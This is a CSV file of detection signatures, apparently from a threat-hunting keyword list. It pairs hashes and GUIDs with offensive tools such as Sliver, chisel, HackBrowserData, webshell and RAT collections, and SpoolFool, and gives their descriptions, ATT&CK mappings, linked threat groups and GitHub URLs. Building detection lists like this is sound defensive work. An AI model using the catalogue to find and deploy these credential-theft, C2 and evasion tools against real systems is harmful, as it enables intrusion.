"*4c368fe58781e363b1176be2a6efcfaaa74432309d1cfc251174a5650debfbe8*",".{0,1000}4c368fe58781e363b1176be2a6efcfaaa74432309d1cfc251174a5650debfbe8.{0,1000}","offensive_tool_keyword","moonwalk","Cover your tracks during Linux Exploitation by leaving zero traces on system logs and filesystem timestamps.","T1070 - T1036.005 - T1070.004","TA0005 - TA0009","N/A","N/A","Defense Evasion","https://github.com/mufeedvh/moonwalk","1","0","#filehash #linux","N/A","10","10","1440","129","2022-10-08T05:05:36Z","2021-12-19T11:24:00Z","26202"
"*4c3a4595aa10debb79201746369cde2688d0376227a4dfbbd6c1a22ed4067501*",".{0,1000}4c3a4595aa10debb79201746369cde2688d0376227a4dfbbd6c1a22ed4067501.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26203"
"*4C3B106C-8782-4374-9459-851749072123*",".{0,1000}4C3B106C\-8782\-4374\-9459\-851749072123.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","#GUIDproject","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","26204"
"*4c3d4cbeec3d722929d86c0bf19108b3eac090fc5dc8fcde2cf818ff16e6fc5b*",".{0,1000}4c3d4cbeec3d722929d86c0bf19108b3eac090fc5dc8fcde2cf818ff16e6fc5b.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26205"
"*4c3e3beb897dcb9a41bf4a4a051267b880b4b0f2a8691816775c2ff18d1c5bc5*",".{0,1000}4c3e3beb897dcb9a41bf4a4a051267b880b4b0f2a8691816775c2ff18d1c5bc5.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26207"
"*4c4377d6edeb56ea60d2654fec0afc21001cd93ceedaa483f53f66bb61b7904c*",".{0,1000}4c4377d6edeb56ea60d2654fec0afc21001cd93ceedaa483f53f66bb61b7904c.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26209"
"*4c4497c8203934c12bd09ac33096b11ced541744f6b4121c2967e4cfea6e250b*",".{0,1000}4c4497c8203934c12bd09ac33096b11ced541744f6b4121c2967e4cfea6e250b.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26210"
"*4C496D14-FA2B-428C-BB15-20B25BAB9B73*",".{0,1000}4C496D14\-FA2B\-428C\-BB15\-20B25BAB9B73.{0,1000}","offensive_tool_keyword","PrivFu","manage user right without secpol.msc","T1059 - T1078","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","UserRightsUtil","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","26212"
"*4c4b0e00d9620697ba7ef9ff00fd58022b9e39db23dc65348fce5d3a321000e6*",".{0,1000}4c4b0e00d9620697ba7ef9ff00fd58022b9e39db23dc65348fce5d3a321000e6.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26216"
"*4c54cdeb6cd364faeacd795930d6878dc04f38dd2e1fd4c7b850967085d9ab01*",".{0,1000}4c54cdeb6cd364faeacd795930d6878dc04f38dd2e1fd4c7b850967085d9ab01.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26218"
"*4C574B86-DC07-47EA-BB02-FD50AE002910*",".{0,1000}4C574B86\-DC07\-47EA\-BB02\-FD50AE002910.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","26219"
"*4c589dec2312f0a4f27d747aa77671f30699cbef80554d8fb1d85cf13642a753*",".{0,1000}4c589dec2312f0a4f27d747aa77671f30699cbef80554d8fb1d85cf13642a753.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26220"
"*4C61F4EA-D946-4AF2-924B-7A873B4D964B*",".{0,1000}4C61F4EA\-D946\-4AF2\-924B\-7A873B4D964B.{0,1000}","offensive_tool_keyword","PrivFu","Kernel Mode WinDbg extension for token privilege edit","T1055 - T1078 - T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#GUIDproject","PrivEditor","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","26221"
"*4c66ef14f4cc5abf79a799b9593298278d636d9150e53b6560351e1ecbd0f6fc*",".{0,1000}4c66ef14f4cc5abf79a799b9593298278d636d9150e53b6560351e1ecbd0f6fc.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26222"
"*4c7260ac051907d12896054145fe103f9ea06de3bb2f04f0aab953dff32028de*",".{0,1000}4c7260ac051907d12896054145fe103f9ea06de3bb2f04f0aab953dff32028de.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","26225"
"*4c739d4f3575d5cb19d15fcc02f55c31d30973bc9b787050c13edb8e873d8b54*",".{0,1000}4c739d4f3575d5cb19d15fcc02f55c31d30973bc9b787050c13edb8e873d8b54.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26226"
"*4c7714ee-c58d-4ef7-98f2-b162baec0ee0*",".{0,1000}4c7714ee\-c58d\-4ef7\-98f2\-b162baec0ee0.{0,1000}","offensive_tool_keyword","SpoolFool","Exploit for CVE-2022-21999 - Windows Print Spooler Elevation of Privilege Vulnerability (LPE)","T1068 - T1055 - T1059.003","TA0004 - TA0005 - TA0003","","Dispossessor","Privilege Escalation","https://github.com/ly4k/SpoolFool","1","0","#GUIDproject","N/A","9","8","788","160","2022-02-09T16:54:09Z","2022-02-08T17:25:44Z","26227"
"*4c7e46c84520992d28f771d25ed6a4d4ccd902530f5721ee1314d9de48edbd27*",".{0,1000}4c7e46c84520992d28f771d25ed6a4d4ccd902530f5721ee1314d9de48edbd27.{0,1000}","offensive_tool_keyword","EternalBlack","EternalRomance exploit implemented by Playbit EternalBlack often used by ransomware group like Dispossessor","T1210 - T1489 - T1105 - T1486","TA0001 - TA0002 - TA0009 - TA0040","EternalBlack","Dispossessor ","Exploitation tool","https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","26229"
"*4c89adb840e2c8c3dfba56ae1eda0447046bcf0796108ffc1c2d446fa3c5a200*",".{0,1000}4c89adb840e2c8c3dfba56ae1eda0447046bcf0796108ffc1c2d446fa3c5a200.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26230"
"*4c8e4b74f3326949830cf3974abc31a71852f557ae1bb9d0f4bfc1a92eb95b01*",".{0,1000}4c8e4b74f3326949830cf3974abc31a71852f557ae1bb9d0f4bfc1a92eb95b01.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26232"
"*4c9c4d9df645d45510841d2edd07bd156bbb7ecd268626895f9b4d5ac8483633*",".{0,1000}4c9c4d9df645d45510841d2edd07bd156bbb7ecd268626895f9b4d5ac8483633.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","26237"
"*4c9e1588af0f951fbb311cd29bac8ce03c7d00175d5ef6747bab9ef127abc0c4*",".{0,1000}4c9e1588af0f951fbb311cd29bac8ce03c7d00175d5ef6747bab9ef127abc0c4.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","26238"
"*4c9f7dd3c55b538d9c566ca20f097002c54c2b4419066e412ea27cf39fc6a83a*",".{0,1000}4c9f7dd3c55b538d9c566ca20f097002c54c2b4419066e412ea27cf39fc6a83a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26239"
"*4CA05D5C-AF6B-4F45-81E0-788BAA8D11A2*",".{0,1000}4CA05D5C\-AF6B\-4F45\-81E0\-788BAA8D11A2.{0,1000}","offensive_tool_keyword","SharpEventLog","reads all computer information related to successful (4624) or failed (4625) logins on the local machine to quickly identify operations and maintenance personnel during internal network penetration","T1078 - T1087.001","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpEventLog","1","0","#GUIDproject","N/A","4","3","205","34","2019-10-15T06:26:52Z","2019-10-15T06:14:32Z","26240"
"*4ca2ba1a91f4977c79f130d516ca39d92c5be9178bb9b264d16927cc7e820fec*",".{0,1000}4ca2ba1a91f4977c79f130d516ca39d92c5be9178bb9b264d16927cc7e820fec.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26241"
"*4cad33627c6f2cf9c1ae39d6fb625e23d5f32b41bbaff54e7993349371f5590c*",".{0,1000}4cad33627c6f2cf9c1ae39d6fb625e23d5f32b41bbaff54e7993349371f5590c.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","26242"
"*4caedf29083d75d0d6687f56981fda77cce0849f*",".{0,1000}4caedf29083d75d0d6687f56981fda77cce0849f.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","26243"
"*4cb9f011b700a4e9cad44ca5b8998ae431fcf8ee74f63d343c2504ff6efb1b8e*",".{0,1000}4cb9f011b700a4e9cad44ca5b8998ae431fcf8ee74f63d343c2504ff6efb1b8e.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26245"
"*4cc3c88b175e7c6c9e881707ab3a6b956c7cbcb69a5f61d417d4736f054677b4*",".{0,1000}4cc3c88b175e7c6c9e881707ab3a6b956c7cbcb69a5f61d417d4736f054677b4.{0,1000}","offensive_tool_keyword","DNS-Tunnel-Keylogger","Keylogging server and client that uses DNS tunneling/exfiltration to transmit keystrokes","T1056.001 - T1048.003","TA0009 - TA0011","N/A","N/A","Collection","https://github.com/Geeoon/DNS-Tunnel-Keylogger","1","0","#filehash","N/A","9","3","273","40","2024-06-16T19:47:36Z","2024-01-10T17:25:58Z","26247"
"*4cd278347df495ec92b7acd31c4c61ef13fd6dd9faab74acb09b2ef4360aac6b*",".{0,1000}4cd278347df495ec92b7acd31c4c61ef13fd6dd9faab74acb09b2ef4360aac6b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","26249"
"*4cd39fb92aaed08de5753a2d62d3ee8c29b9f97ba81b7ba674787a3cbc3bf02e*",".{0,1000}4cd39fb92aaed08de5753a2d62d3ee8c29b9f97ba81b7ba674787a3cbc3bf02e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26250"
"*4ce98911b8e13393c58578be23e85776dbf7c95ec878b9f08748d0921855c36b*",".{0,1000}4ce98911b8e13393c58578be23e85776dbf7c95ec878b9f08748d0921855c36b.{0,1000}","offensive_tool_keyword","NtlmThief","Extracting NetNTLM without touching lsass.exe","T1558.003 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/MzHmO/NtlmThief","1","0","#filehash","N/A","10","3","235","33","2023-11-27T14:50:10Z","2023-11-26T08:14:50Z","26256"
"*4cec28b4c00002245dffc8346be0cc11*",".{0,1000}4cec28b4c00002245dffc8346be0cc11.{0,1000}","offensive_tool_keyword","SharpDoor","SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file.","T1059 - T1085 - T1070.004","TA0008 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/infosecn1nja/SharpDoor","1","0","N/A","N/A","7","4","311","61","2019-09-30T16:11:24Z","2019-09-29T02:24:07Z","26258"
"*4ced09f82c47dc6b5943d5bf74a340113f3f6fc193964e1f9a63591850148aaa*",".{0,1000}4ced09f82c47dc6b5943d5bf74a340113f3f6fc193964e1f9a63591850148aaa.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","26259"
"*4ced72b74d1b71171e8af3139858e9f59455f9ce99c426b7b8ab7b436435fb45*",".{0,1000}4ced72b74d1b71171e8af3139858e9f59455f9ce99c426b7b8ab7b436435fb45.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","26260"
"*4cf4468e6bc420ffeb92c8ebad8009cc23f2b5fb35b789511d4cc73d7ed157d7*",".{0,1000}4cf4468e6bc420ffeb92c8ebad8009cc23f2b5fb35b789511d4cc73d7ed157d7.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","26261"
"*4d014c7195a8b7507aa7bc95825371ca83465880e95bdbd411b4dae0a57539af*",".{0,1000}4d014c7195a8b7507aa7bc95825371ca83465880e95bdbd411b4dae0a57539af.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","26262"
"*4d14760b49f084714c356b922b2889402fca1faa5145f64c4441746897fe4d7b*",".{0,1000}4d14760b49f084714c356b922b2889402fca1faa5145f64c4441746897fe4d7b.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","26266"
"*4D164EDE-7180-4A1B-BE82-59BB87542037*",".{0,1000}4D164EDE\-7180\-4A1B\-BE82\-59BB87542037.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#GUIDproject","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","26268"
"*4D1B765D-1287-45B1-AEDC-C4B96CF5CAA2*",".{0,1000}4D1B765D\-1287\-45B1\-AEDC\-C4B96CF5CAA2.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","#GUIDproject","N/A","10","7","671","91","2025-03-12T21:58:25Z","2023-07-24T13:59:16Z","26269"
"*4d1c4cce9f9eb46d0769639886125b3e378621cffddc61d802dfcc9de8018ebe*",".{0,1000}4d1c4cce9f9eb46d0769639886125b3e378621cffddc61d802dfcc9de8018ebe.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","#filehash","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","26270"
"*4d1fd422503b03f89fba5fa6d51e5bccb3e6cd3254461de316ca25296da38d4b*",".{0,1000}4d1fd422503b03f89fba5fa6d51e5bccb3e6cd3254461de316ca25296da38d4b.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","26272"
"*4d206acc72c76a9e6edcd57584b1fcd3094609212e15ba7f4afb4a9cde3534a1*",".{0,1000}4d206acc72c76a9e6edcd57584b1fcd3094609212e15ba7f4afb4a9cde3534a1.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","26273"
"*4d24f3932f028ac9d06c80770c3390ec3ce163d6e07344b4e3daa9c93061192d*",".{0,1000}4d24f3932f028ac9d06c80770c3390ec3ce163d6e07344b4e3daa9c93061192d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","26274"
"*4d262988fe9d252191947ab780535d496ed24fa27668cf76c6cb9b6474a391c4*",".{0,1000}4d262988fe9d252191947ab780535d496ed24fa27668cf76c6cb9b6474a391c4.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","#filehash","N/A","8","5","440","61","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z","26275"
